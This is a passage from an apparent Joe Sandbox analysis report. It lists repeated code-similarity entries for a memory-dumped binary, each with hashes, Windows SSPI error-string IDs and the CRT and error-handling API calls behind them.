                                      • Instruction Fuzzy Hash: 4B01EC2560D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_BUFFER_TOO_SMALL
                                      • API String ID: 2544740495-2050584575
                                      • Opcode ID: 3bed5df98c29a34f6716d06785b1618b5447e05bfe6b7e48da1a7065c33941ed
                                      • Instruction ID: 6d6d3cfee51a26b4e579ea52b35b13c8bfd3f09ae6b6f9e7cf2fa8b755f0b0ed
                                      • Opcode Fuzzy Hash: 3bed5df98c29a34f6716d06785b1618b5447e05bfe6b7e48da1a7065c33941ed
                                      • Instruction Fuzzy Hash: C901EC2560D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3CA449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_ALGORITHM_MISMATCH
                                      • API String ID: 2544740495-610387095
                                      • Opcode ID: b900f2a389954035773d7d15278cae6056f7cf10232b9d949d7c249253186678
                                      • Instruction ID: 2e8e5c364bca375aa0b58b96d7417d3fe9cf7ce9d4e2a06d2b3d7c57d72b400b
                                      • Opcode Fuzzy Hash: b900f2a389954035773d7d15278cae6056f7cf10232b9d949d7c249253186678
                                      • Instruction Fuzzy Hash: AF012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_MUST_BE_KDC
                                      • API String ID: 2544740495-2335993699
                                      • Opcode ID: dea6ffc0b8b72aaaad6682cf6653a5c2baf81b037f937a8cd5077da2c6a79628
                                      • Instruction ID: 85029bd9ced2d97c792df3312888429a6506d9b8ad99121240c3f03415a2021a
                                      • Opcode Fuzzy Hash: dea6ffc0b8b72aaaad6682cf6653a5c2baf81b037f937a8cd5077da2c6a79628
                                      • Instruction Fuzzy Hash: 55012C2560D94296F755BB61A0142BCE311AF5CBA1FC50075CA2E027D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_NOT_OWNER
                                      • API String ID: 2544740495-507308227
                                      • Opcode ID: 73727401563156496e36667145b69b6cb43f862891947be141316d82d1d2d095
                                      • Instruction ID: 4ae8d305585568935b9848d4eb54f28f3c1427e79ba6ba1624f963e0e411fdec
                                      • Opcode Fuzzy Hash: 73727401563156496e36667145b69b6cb43f862891947be141316d82d1d2d095
                                      • Instruction Fuzzy Hash: 0701EC2560D946DAF755BF61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_NO_AUTHENTICATING_AUTHORITY
                                      • API String ID: 2544740495-3363050765
                                      • Opcode ID: b2e8b78780d31bde5b0041230b9b95281c348725faafd9980254ce2bc6e88244
                                      • Instruction ID: 88c2516f3d8e8d9ed6268d4270a82785c7533111aae3f5a93fef4520ef18c769
                                      • Opcode Fuzzy Hash: b2e8b78780d31bde5b0041230b9b95281c348725faafd9980254ce2bc6e88244
                                      • Instruction Fuzzy Hash: 34012C2560D94296F755BF61A0142BCE311AF5CBA1FC50075CA2E027D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_MAX_REFERRALS_EXCEEDED
                                      • API String ID: 2544740495-13904994
                                      • Opcode ID: cac80be5a4ba4d762a92130ed4b54ef93ca636ca5feb911ae1e24dd292b28958
                                      • Instruction ID: d28b1a47c06bc0fb01f62bdd1bcc26b558a53ac08845a9549d367a743184861a
                                      • Opcode Fuzzy Hash: cac80be5a4ba4d762a92130ed4b54ef93ca636ca5feb911ae1e24dd292b28958
                                      • Instruction Fuzzy Hash: 9101EC2560D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E077D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_MESSAGE_ALTERED
                                      • API String ID: 2544740495-4024968056
                                      • Opcode ID: abc3dd77ed88e2fd31289fd170f195664378ce8317f7e657f6191725c78530d8
                                      • Instruction ID: 9b62dc0c5e1da1c468bea7cc67da442848c82bca2fec08e220bde66edee44041
                                      • Opcode Fuzzy Hash: abc3dd77ed88e2fd31289fd170f195664378ce8317f7e657f6191725c78530d8
                                      • Instruction Fuzzy Hash: 8D01EC2560D94696F755BB61A0182BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_MULTIPLE_ACCOUNTS
                                      • API String ID: 2544740495-2625018790
                                      • Opcode ID: 18d7a77bb6eebb0e19f7b2d1c9ab3b1f5a5b8084e8ea0c9812bd04e9ab14fa2e
                                      • Instruction ID: 8c8fc346427adab258358bc3ec701ed7c4aaa4dbc245f2a8e33c95857b7987cf
                                      • Opcode Fuzzy Hash: 18d7a77bb6eebb0e19f7b2d1c9ab3b1f5a5b8084e8ea0c9812bd04e9ab14fa2e
                                      • Instruction Fuzzy Hash: 4C01EC2560D94696F755BF61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_KDC_UNKNOWN_ETYPE
                                      • API String ID: 2544740495-184080383
                                      • Opcode ID: 37f0b87a7b8ac81de243454854b6969c8a8f2aad8e75a53d304b9d3690034cd3
                                      • Instruction ID: 7daa5e74aeeecb588189eecaefc52918b6b71daf1a7f719e026d2400063f2f3c
                                      • Opcode Fuzzy Hash: 37f0b87a7b8ac81de243454854b6969c8a8f2aad8e75a53d304b9d3690034cd3
                                      • Instruction Fuzzy Hash: 6701EC2560D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3CA449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_LOGON_DENIED
                                      • API String ID: 2544740495-2665946957
                                      • Opcode ID: f43a57241183239cece5b793cfea69be0413d2116ab62fab1d12fe4b137df0e0
                                      • Instruction ID: 54b3b6d459ab105741904f2982dd42b4f73deea5cd05f61a4b35ac9ee1cd7a15
                                      • Opcode Fuzzy Hash: f43a57241183239cece5b793cfea69be0413d2116ab62fab1d12fe4b137df0e0
                                      • Instruction Fuzzy Hash: E801EC2560D94696F755BF61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_KDC_CERT_REVOKED
                                      • API String ID: 2544740495-410780751
                                      • Opcode ID: 06811764f3b15f07d1accc6c1b2c435b04b4650dd90b25866e0913bc58556fe9
                                      • Instruction ID: 6ed841f12600b785770e014355a293a334ef9e67a6a2c987d2e77ffc657ecda2
                                      • Opcode Fuzzy Hash: 06811764f3b15f07d1accc6c1b2c435b04b4650dd90b25866e0913bc58556fe9
                                      • Instruction Fuzzy Hash: BE012C2560D94296F755BB61A0142BCE311AF5CBA1FC50075CA2E027D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_KDC_INVALID_REQUEST
                                      • API String ID: 2544740495-4010066767
                                      • Opcode ID: 7e9ddc52939405fedee23a66ab38f39949c95864dac535fe1b15fed4bfb17f9b
                                      • Instruction ID: b314e0c29d83152fba2450447c3269c81b4368186ccb1824cc9a3a88c3089fb3
                                      • Opcode Fuzzy Hash: 7e9ddc52939405fedee23a66ab38f39949c95864dac535fe1b15fed4bfb17f9b
                                      • Instruction Fuzzy Hash: B401FF2560D94696F755BF61A0142BCE311AF5CBA5FC50075CE2E077D1CF3C9449A3B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_KDC_UNABLE_TO_REFER
                                      • API String ID: 2544740495-2113599717
                                      • Opcode ID: e4f320c011a8c28e3f79da50965ec0080bfa5048a0d0e5248695ad92d96ca9a4
                                      • Instruction ID: 3c9d1c9c370d243cefd7548f904bd862854056a09247ac598253cd111e43cffe
                                      • Opcode Fuzzy Hash: e4f320c011a8c28e3f79da50965ec0080bfa5048a0d0e5248695ad92d96ca9a4
                                      • Instruction Fuzzy Hash: ED01FF2560D94696F755BF61A0142BCE311AF5CBA5FC50075CE2E077D1CF3C9449A3B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_ISSUING_CA_UNTRUSTED
                                      • API String ID: 2544740495-2997121769
                                      • Opcode ID: 0c8bdd05eb0abf6e797be60cda9dc7242f506c2ebcf1c191d72ccd25157d944d
                                      • Instruction ID: 86a07f4a31fc90a311b92e383f3a71d8f652819fc0a21476c77cf6475fa63b83
                                      • Opcode Fuzzy Hash: 0c8bdd05eb0abf6e797be60cda9dc7242f506c2ebcf1c191d72ccd25157d944d
                                      • Instruction Fuzzy Hash: 9901FF2560D94696F755BF61A0182BCE311AF5CBA5FC50075CE2E077D1CF3C9449A3B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_ISSUING_CA_UNTRUSTED_KDC
                                      • API String ID: 2544740495-2787320099
                                      • Opcode ID: 134ad07d3c7260d8763d07645703fbc15f7095cc89f6e0e63e274dce7e0c0391
                                      • Instruction ID: d1c355c7536b6a85294dcbc208172b71842e20b4f40967aee76b3c56df1fe9b2
                                      • Opcode Fuzzy Hash: 134ad07d3c7260d8763d07645703fbc15f7095cc89f6e0e63e274dce7e0c0391
                                      • Instruction Fuzzy Hash: 6E01EC25A0D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3CA449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_KDC_CERT_EXPIRED
                                      • API String ID: 2544740495-3163653577
                                      • Opcode ID: 6a3c47a4c65ba20f766b26a128b371bad881487c514825d21d0e4adfb707a855
                                      • Instruction ID: cf8d4b35e0cfd2b4f7115bbd1082f6c516926da3eff638d35cd6fff390bc3a88
                                      • Opcode Fuzzy Hash: 6a3c47a4c65ba20f766b26a128b371bad881487c514825d21d0e4adfb707a855
                                      • Instruction Fuzzy Hash: 3701EC2560D94696F755BB61A0142BCE321AF5CBA5FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Connection was aborted
                                      • API String ID: 4135170618-4252434314
                                      • Opcode ID: 83a56e0cd3224e774aef809c3f02de0d5c596042167190ff4607cf459eec38c8
                                      • Instruction ID: 43733abd53ce41e31fd5d58e04d7a2360f627e419547a7580942fb4a75740f0d
                                      • Opcode Fuzzy Hash: 83a56e0cd3224e774aef809c3f02de0d5c596042167190ff4607cf459eec38c8
                                      • Instruction Fuzzy Hash: 86F01D25A0DA4696E750AF65A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Connection was reset
                                      • API String ID: 4135170618-3362216063
                                      • Opcode ID: 248e41a5f6b3ea74a7719f1a4c249f52006d73b2fda99c4bc667b5e531727a37
                                      • Instruction ID: dcc70dcaf6c661978b7ef0fd0b67c15f086b863cfa0df2c6a8232e8d8247ffdc
                                      • Opcode Fuzzy Hash: 248e41a5f6b3ea74a7719f1a4c249f52006d73b2fda99c4bc667b5e531727a37
                                      • Instruction Fuzzy Hash: E6F01D25A0DA4696E750AF65A504129F321FF5CBD5F880071DA6E03BD4CF3DE848E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
